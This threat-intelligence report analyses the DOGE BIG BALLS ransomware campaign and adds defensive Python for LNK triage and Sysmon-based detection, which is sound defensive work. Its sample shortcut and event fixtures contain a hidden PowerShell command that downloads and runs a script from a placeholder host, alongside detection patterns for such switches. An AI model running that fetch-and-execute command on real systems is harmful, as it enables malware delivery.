Full Report
Cyble researchers have uncovered a ransomware campaign calling itself DOGE BIG BALLS, which stands out as much for its audacious psychological manipulation as for its technical tradecraft. The campaign combines a kernel-driver exploit, social engineering, and a deliberate attempt to misattribute blame, naming Edward Coristine, a 19-year-old software engineer associated with Elon Musk's DOGE initiative.

The Genesis of the DOGE BIG BALLS Attack: A Deceptive ZIP File

[Figure: DOGE BIG Infection Chain (Source: Cyble)]

The attack begins with a seemingly innocuous ZIP file titled "Pay Adjustment.zip," typically delivered through phishing emails. Inside is a shortcut file named "Pay Adjustment.pdf.lnk": the double extension makes it look like a PDF to a user whose file manager hides known extensions.

[Figure: Contents of LNK file (Source: Cyble)]

When opened, the shortcut silently runs a series of PowerShell commands that start a multi-stage infection. The first script, stage1.ps1, checks whether it is running with administrative privileges. If it is, it downloads and executes a modified build of Fog ransomware, written as "Adobe Acrobat.exe" into a hidden folder under the system's startup directory.

[Figure: Doge Big Balls Ransomware Prompt (Source: Cyble)]

The startup-folder placement gives the ransomware persistence across logons. Its elevated privileges come from the administrative-rights check and, as described next, from the kernel exploit, not from where the file is stored.

Exploiting Kernel Vulnerabilities: The CVE-2015-2291 Flaw

A pivotal aspect of this attack is the exploitation of CVE-2015-2291, a vulnerability in Intel's Ethernet diagnostics driver (iqvw64e.sys). The flaw lets a local attacker execute arbitrary code with kernel privileges through specially crafted IOCTL calls. Because the driver carries a legitimate signature, the attackers bring it with them and load it themselves, the bring-your-own-vulnerable-driver (BYOVD) pattern; by leveraging the flaw they escalate privileges, disable security logging, and maintain persistence on the compromised system.

The tool ktool.exe performs the exploitation. It installs the vulnerable driver as a kernel-mode service, which gives the ransomware process direct access to kernel memory. With that access it copies the token of the SYSTEM process into the ransomware process, elevating it to SYSTEM and enabling it to disable security mechanisms.

Psychological Manipulation: The "DOGE BIG BALLS" Branding

The ransomware's name is a deliberate attempt to associate the attack with Edward Coristine and the DOGE initiative. Coristine is a prominent figure in the tech community, known for his involvement with Elon Musk's Department of Government Efficiency (DOGE). By incorporating his name and the DOGE reference, the attackers aim to create confusion and misdirect any investigation. The ransom note compounds the misdirection by including Coristine's personal details, such as his home address and phone number.

[Figure: Chat window (Source: Cyble)]

This tactic serves both to intimidate the victim and to divert attention from the true perpetrators.

Advanced Reconnaissance and Geolocation Techniques

Beyond encryption, the attackers gather intelligence about their victims. The lootsubmit.ps1 script collects extensive system and network information, including hardware IDs, firewall state, network configuration, and running processes, and transmits it to the attackers via a cloud hosting platform (Netlify), supporting victim profiling and potential follow-on attacks.

Notably, the attackers use the Wigle.net API to determine the victim's physical location. By looking up the BSSID, the MAC address of the Wi-Fi access point the victim is connected to, against Wigle's crowdsourced wardriving database, they can place the machine far more precisely than IP-based geolocation allows. The lookup only works when the host has a wireless interface and the access point has been catalogued, but where it does it yields a street-level position.

The Role of Havoc C2 Beacon in Post-Exploitation

Embedded within the attack is a Havoc C2 beacon (demon.x64.dll), indicating that the attackers can maintain long-term access or conduct additional post-encryption activity. The beacon communicates with the attackers' command-and-control infrastructure, letting them issue further instructions or exfiltrate additional data from the compromised system.

The Involvement of Edward Coristine: A Case of Misattribution

Edward Coristine's name appears prominently in the ransom note, accompanied by his personal contact information. This is a strategic move by the attackers to mislead investigators and the public into believing that Coristine is responsible for the attack. In reality, Coristine has no involvement in this cybercrime; the use of his name is a calculated attempt to exploit his association with DOGE and create a false narrative. His involvement with DOGE, a project aimed at promoting efficiency and transparency in government operations, has made him a recognizable figure, and by attaching his name to the ransomware the attackers seek to borrow that profile to lend credibility to their demands and confuse potential investigators.

Conclusion

DOGE BIG BALLS combines technical tradecraft, psychological manipulation, and strategic misdirection, including the false attribution to Edward Coristine, so organizations and individuals need a proactive, layered defense. Effective mitigation begins with application-control policies that block untrusted LNK files and PowerShell scripts (PowerShell's own execution policy is a convenience setting, not a security boundary), together with consistent monitoring of PowerShell activity for anomalies. Advanced Endpoint Detection and Response (EDR) tooling capable of identifying fileless malware and suspicious behavior is essential. Limiting administrative privileges through Role-Based Access Control (RBAC) and monitoring for privilege-escalation attempts reduce exposure further, and because the escalation here depends on loading a known-vulnerable signed driver, enabling Microsoft's vulnerable driver blocklist (enforced with HVCI) stops iqvw64e.sys from being loaded at all. Finally, blocking unauthorized outbound connections to services like Netlify and external APIs such as Wigle.net is crucial for preventing data exfiltration and geolocation tracking.
Analysis Summary
# Tool/Technique: DOGE BIG BALLS Ransomware
## Overview
DOGE BIG BALLS is a ransomware campaign whose encryptor is a modified build of Fog ransomware, delivered through a phishing ZIP and staged with PowerShell. A key distinguishing feature of the campaign is the use of strategic misdirection and **reputation damage**, specifically by falsely attributing the attacks to a public figure (Edward Coristine) associated with the DOGE initiative in order to mislead investigators and lend credibility to the ransom demands.
## Technical Details
- Type: Malware family (Ransomware; modified Fog build) with supporting tooling (ktool.exe privilege-escalation tool, Havoc C2 beacon)
- Platform: Windows (LNK shortcut, PowerShell stages, x64 kernel driver iqvw64e.sys, demon.x64.dll)
- Capabilities: File encryption; multi-stage PowerShell execution from an LNK lure; BYOVD kernel exploitation (CVE-2015-2291) for SYSTEM privileges; host and network reconnaissance with upload to a Netlify-hosted endpoint; Wi-Fi BSSID geolocation via the Wigle.net API; Havoc C2 post-exploitation access; psychological manipulation through false attribution.
- First Seen: Not stated in the report.
## MITRE ATT&CK Mapping
Based on the infection chain described in the report:
- **TA0001 - Initial Access**
- T1566.001 - Phishing: Spearphishing Attachment ("Pay Adjustment.zip" delivered by email)
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File (victim opens "Pay Adjustment.pdf.lnk")
- T1059.001 - Command and Scripting Interpreter: PowerShell (stage1.ps1, lootsubmit.ps1)
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (payload written to a hidden folder under the Startup directory)
- **TA0004 - Privilege Escalation**
- T1068 - Exploitation for Privilege Escalation (CVE-2015-2291 in iqvw64e.sys, loaded by ktool.exe)
- T1134.001 - Access Token Manipulation: Token Impersonation/Theft (SYSTEM token copied into the ransomware process)
- **TA0005 - Defense Evasion**
- T1036.007 - Masquerading: Double File Extension (.pdf.lnk)
- T1036.005 - Masquerading: Match Legitimate Name or Location ("Adobe Acrobat.exe")
- T1562.002 - Impair Defenses: Disable Windows Event Logging (security logging disabled through kernel access)
- T1564.001 - Hide Artifacts: Hidden Files and Directories (hidden startup folder)
- **TA0007 - Discovery**
- T1082 - System Information Discovery, T1016 - System Network Configuration Discovery, T1057 - Process Discovery, T1518.001 - Security Software Discovery (firewall state), all via lootsubmit.ps1
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (Havoc C2 beacon, demon.x64.dll)
- **TA0010 - Exfiltration**
- T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage (collected data uploaded via Netlify)
- **TA0040 - Impact**
- T1486 - Data Encrypted for Impact
## Functionality
### Core Capabilities
- **Encryption:** A modified Fog ransomware build, dropped as "Adobe Acrobat.exe", encrypts victim data and presents the ransom note.
- **Execution via LNK files:** "Pay Adjustment.pdf.lnk" inside the phishing ZIP starts the chain; the double extension gets the shortcut past user scrutiny wherever the real .lnk extension is hidden.
- **PowerShell Execution:** stage1.ps1 checks for administrative rights and stages the payload; lootsubmit.ps1 handles reconnaissance and upload.
- **Privilege Escalation via BYOVD:** ktool.exe installs Intel's vulnerable iqvw64e.sys driver as a kernel-mode service and exploits CVE-2015-2291 to copy the SYSTEM token into the ransomware process.
- **False Attribution:** The ransom note names Edward Coristine and lists his personal details, leveraging his public profile associated with the DOGE initiative to mislead investigators and the public.
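Static triage of the shortcut lure, covering the "Pay Adjustment.pdf.lnk" delivery described in the report section above and the "Execution via LNK files" capability listed here. This is an added example, not code from Cyble's report: it parses the Shell Link header and StringData fields (MS-SHLLINK) to recover the target, arguments and ShowCommand without launching anything, then applies the double-extension, script-host and hidden-window checks. The sample shortcut is constructed in the block with a hypothetical download URL; it is not the campaign's actual command line.

```python
"""Static triage of .lnk attachments without following the shortcut.
Added example; the sample shortcut below is constructed, not the real lure."""
import re
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the spawned window out of sight
# StringData sections appear in this fixed order when their flag is set
STRING_ORDER = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                (HAS_ICON_LOCATION, "icon_location"))

DOUBLE_EXT = re.compile(r"(?i)\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$")
PS_SWITCHES = re.compile(r"(?i)-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b"
                         r"|-ep\s+bypass|downloadstring|invoke-webrequest|iwr\b|iex\b")


def _read_string(buf, off, unicode):
    """StringData item: 2-byte character count followed by the characters."""
    (n,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + 2 * n].decode("utf-16-le"), off + 2 * n
    return buf[off:off + n].decode("cp1252", "replace"), off + n


def parse_lnk(buf):
    """Return ShowCommand plus whichever StringData fields the shortcut carries."""
    if (len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_cmd,) = struct.unpack_from("<I", buf, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDList: 2-byte size + items
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo: 4-byte total size
        off += struct.unpack_from("<I", buf, off)[0]
    info = {"show_command": show_cmd}
    for bit, name in STRING_ORDER:
        if flags & bit:
            info[name], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return info


def triage_lnk(filename, buf):
    """Findings for one attachment; an empty list means nothing suspicious."""
    info = parse_lnk(buf)
    findings = []
    if DOUBLE_EXT.search(filename):
        findings.append("double extension hides .lnk behind a document name")
    target = info.get("relative_path", "").lower()
    if any(h in target for h in ("powershell", "pwsh", "cmd.exe", "mshta", "wscript")):
        findings.append("shortcut target is a script host, not a document")
    if PS_SWITCHES.search(info.get("arguments", "")):
        findings.append("arguments use hidden/encoded/download switches")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7 keeps the spawned window minimised")
    return findings


def build_lnk(relative_path, arguments, show_command=1):
    """Minimal Shell Link (header + StringData only), used to construct the sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\0" * (60 - len(header)) + struct.pack("<I", show_command)
    header += b"\0" * (HEADER_SIZE - len(header))   # HotKey and Reserved fields

    def enc(value):
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")
    return header + enc(relative_path) + enc(arguments)


# Constructed sample standing in for the phishing shortcut (hypothetical URL).
SAMPLE_NAME = "Pay Adjustment.pdf.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('https://example.invalid/stage1.ps1')\"",
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for finding in triage_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print(f"[!] {SAMPLE_NAME}: {finding}")
```

Run it against real attachments by reading the file bytes and passing the original filename; shortcuts with a LinkTargetIDList and no RELATIVE_PATH still parse, but the target then lives in the IDList, which this triage does not decode, so treat an empty `relative_path` as a reason to sandbox rather than clear the file.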
### Advanced Features
- **Psychological Manipulation:** The false Coristine/DOGE narrative is used both to intimidate victims and to lend credibility to the demands while confusing investigators.
- **Reconnaissance and Geolocation:** lootsubmit.ps1 collects hardware IDs, firewall state, network configuration and running processes, uploads them to a Netlify-hosted endpoint, and queries the Wigle.net API with the victim's Wi-Fi BSSID to obtain a physical location more precise than IP geolocation. These outbound connections are what defenders should block.
- **Post-Exploitation Access:** A Havoc C2 beacon (demon.x64.dll) gives the operators a channel for further commands or exfiltration after encryption.
- **Defense Impairment:** Kernel access obtained through the driver exploit is used to disable security logging and other protections, so later stages leave fewer traces; detection has to rely on behavior (driver loads, PowerShell activity, in-memory execution) rather than on the payload alone.
## Indicators of Compromise
- File Hashes: Not provided in this summary.
- File Names: Pay Adjustment.zip; Pay Adjustment.pdf.lnk; stage1.ps1; lootsubmit.ps1; Adobe Acrobat.exe (ransomware payload, in a hidden folder under the Startup directory); ktool.exe (driver loader and exploit); iqvw64e.sys (vulnerable Intel driver); demon.x64.dll (Havoc beacon).
- Registry Keys: Not provided.
- Network Indicators: Outbound connections from non-browser processes to Netlify-hosted endpoints and to the `wigle[.]net` API; Havoc C2 beaconing (infrastructure not listed in the summary).
- Behavioral Indicators:
- A PowerShell process spawned by explorer.exe after a .lnk with a double extension is opened.
- PowerShell downloading and executing further stages after checking for administrative rights.
- A kernel-mode driver service installed from a user-writable path, and iqvw64e.sys loaded on a host that has no Intel Ethernet diagnostics tooling.
- An executable named "Adobe Acrobat.exe" running from the Startup folder rather than from Program Files.
- Security event logging stopping abruptly, followed by encryption activity.
## Associated Threat Actors
- The threat actors disguise their identity by framing Edward Coristine. The operating group is not identified in the report; the encryptor is a modified Fog ransomware build.
## Detection Methods
- **Signature-based detection:** Hashes of the dropped files and of iqvw64e.sys (the latter already present in vulnerable-driver blocklists), if and when published.
- **Behavioral detection:** Essential for catching LNK-launched PowerShell (explorer.exe spawning powershell.exe with hidden, encoded or download switches), kernel driver services created from user-writable paths, and executables dropped into Startup folders.
- **YARA rules:** Not provided.
- **Network monitoring:** Alert on non-browser processes resolving or contacting wigle.net or Netlify-hosted endpoints, and on beaconing consistent with Havoc.
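The behavioral indicators and detection methods above as runnable logic, serving both this section and the report's conclusion. This is an added example and not part of Cyble's report: each event is a dict using Sysmon field names (EventID 1 process create, 6 driver load, 11 file create, 3 network connection, 22 DNS query, plus a System-log 7045 service install), and the timeline is constructed to mirror the chain. The `netlify.app` domain pattern, the user name and the file paths are assumptions.

```python
"""Behavioral detection for the LNK -> PowerShell -> BYOVD -> Startup-folder chain.
Added example over constructed Sysmon-style events; field names follow Sysmon."""
import re

# Name-based for the demo; in production key BYOVD detection on driver hashes from
# Microsoft's vulnerable driver blocklist or loldrivers.io, not on file names.
VULN_DRIVERS = {"iqvw64e.sys"}
SUSPICIOUS_PS = re.compile(r"(?i)-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b"
                           r"|downloadstring|invoke-webrequest|iex\b")
STARTUP_DIR = re.compile(r"(?i)\\start menu\\programs\\startup\\")
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(users|programdata|windows\\temp)\\")
GEO_EXFIL_HOSTS = re.compile(r"(?i)(^|\.)(wigle\.net|netlify\.app)$")  # assumed domains
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (event_index, rule_id, description) for every rule that fires."""
    hits = []
    for i, e in enumerate(events):
        eid = e["EventID"]
        if eid == 1:  # process creation
            img, parent = _base(e["Image"]), _base(e.get("ParentImage", ""))
            if (img in SCRIPT_HOSTS and parent == "explorer.exe"
                    and SUSPICIOUS_PS.search(e.get("CommandLine", ""))):
                hits.append((i, "R1", "PowerShell with hidden/encoded/download switches "
                                      "launched from Explorer (LNK double-click)"))
            if img == "adobe acrobat.exe" and not e["Image"].lower().startswith(
                    ("c:\\program files\\", "c:\\program files (x86)\\")):
                hits.append((i, "R5", "Process masquerading as Adobe Acrobat "
                                      "from a non-standard path"))
        elif eid == 11:  # file create
            target = e["TargetFilename"]
            if STARTUP_DIR.search(target) and target.lower().endswith(".exe"):
                hits.append((i, "R2", "Executable dropped into a Startup folder"))
        elif eid == 7045:  # System log: new service installed
            if (e.get("ServiceType", "").lower().startswith("kernel")
                    and USER_WRITABLE.search(e.get("ImagePath", ""))):
                hits.append((i, "R3", "Kernel driver service installed "
                                      "from a user-writable path"))
        elif eid == 6:  # driver loaded
            if _base(e["ImageLoaded"]) in VULN_DRIVERS:
                hits.append((i, "R4", "Known-vulnerable driver loaded (BYOVD)"))
        elif eid in (3, 22):  # network connection / DNS query
            host = e.get("DestinationHostname") or e.get("QueryName", "")
            if GEO_EXFIL_HOSTS.search(host) and _base(e["Image"]) not in BROWSERS:
                hits.append((i, "R6", f"Non-browser process contacting {host} "
                                      "(geolocation/exfiltration)"))
    return hits


def chain_score(hits):
    """Distinct rules on one host; three or more is treated as the full chain."""
    return len({rule for _, rule, _ in hits})


# Constructed timeline for one host (assumed paths and user name).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = (r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
           r"\Startup\.cache\Adobe Acrobat.exe")
DRIVER = r"C:\Users\alice\AppData\Local\Temp\iqvw64e.sys"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/stage1.ps1')\""},
    {"EventID": 11, "Image": PS, "TargetFilename": PAYLOAD},
    {"EventID": 7045, "ServiceName": "ktool", "ServiceType": "kernel mode driver",
     "ImagePath": DRIVER},
    {"EventID": 6, "ImageLoaded": DRIVER, "Signed": "true"},
    {"EventID": 1, "Image": PAYLOAD, "ParentImage": PS, "CommandLine": "\"Adobe Acrobat.exe\""},
    {"EventID": 22, "Image": PS, "QueryName": "api.wigle.net"},
    {"EventID": 3, "Image": PS, "DestinationHostname": "loot-drop.netlify.app"},
]
BENIGN_EVENTS = [  # admin shell, browser visiting wigle, normal driver, document save
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "DestinationHostname": "wigle.net"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\ndis.sys"},
    {"EventID": 11, "Image": PS, "TargetFilename": r"C:\Users\alice\Documents\report.txt"},
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for idx, rule, desc in found:
        print(f"event {idx}: {rule} {desc}")
    print("chain score:", chain_score(found), "| benign hits:", len(detect(BENIGN_EVENTS)))
```

R1 alone is noisy on hosts where users legitimately run scripts from shortcuts; the value is in `chain_score`, because the R2/R3/R4 sequence (executable in Startup, kernel service from a user path, vulnerable driver loaded) is rare in benign telemetry and, once the driver is loaded, logging may stop, so R3 should page on its own.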
## Mitigation Strategies
- **Application Control:** Block untrusted LNK attachments at the mail gateway and use application control (AppLocker or WDAC) to restrict which scripts and binaries may run; PowerShell's ExecutionPolicy is not a security boundary and should not be relied on for this.
- **Script Monitoring:** Enable PowerShell script block and module logging and review it consistently for anomalies.
- **EDR Deployment:** Deploy Endpoint Detection and Response (EDR) tooling capable of identifying fileless malware and suspicious behavior, in particular driver loads and process chains rather than file hashes alone.
- **Principle of Least Privilege:** Limit administrative privileges using Role-Based Access Control (RBAC); as described, stage1.ps1 proceeds only when it finds administrative privileges, so standard-user accounts break the chain early.
- **Vulnerable Driver Blocking:** Enable Microsoft's vulnerable driver blocklist (enforced with HVCI) so that iqvw64e.sys and similar known-vulnerable signed drivers cannot be loaded.
- **Network Hardening:** Monitor and block unauthorized outbound connections to external services like Netlify and Wigle.net to prevent data exfiltration and geolocation tracking.
## Related Tools/Techniques
- Fog ransomware: the encryptor is a modified Fog build.
- Havoc C2 framework: the embedded demon.x64.dll is Havoc's Demon agent.
- BYOVD tooling: loading a signed but vulnerable driver (here Intel's iqvw64e.sys, CVE-2015-2291) to gain kernel access is a widely reused privilege-escalation technique.
- LNK-plus-PowerShell delivery for initial execution.